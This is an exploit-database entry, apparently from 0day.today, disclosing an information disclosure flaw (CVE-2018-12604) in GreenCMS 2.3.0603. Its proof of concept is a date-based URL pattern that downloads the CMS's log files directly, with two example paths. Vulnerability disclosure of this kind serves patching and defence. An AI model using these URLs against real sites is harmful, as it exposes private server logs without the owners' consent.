id: 30619
date: 06/22/2018
title: GreenCMS 2.3.0603 - Information Disclosure Vulnerability
author: vr_system
cves: CVE-2018-12604

# Exploit Title: GreenCMS 2.3.0603 - remote obtain sensitive information
# Exploit Author: vr_system
# Vendor Homepage: https://github.com/GreenCMS/GreenCMS/
# Software Link: https://github.com/GreenCMS/GreenCMS/
# Version: GreenCMS 2.3.0603
# Tested on: windows 7
# CVE : CVE-2018-12604
 
#  POC£ºhttp://site.com/Data/Log/year_month_day.log.
# Tested Link: 
http://site.com/GreenCMS-beta/Data/Log/18_06_20.log  
http://site.com/Data/Log/18_06_20.log

#  0day.today [2023-03-26]  #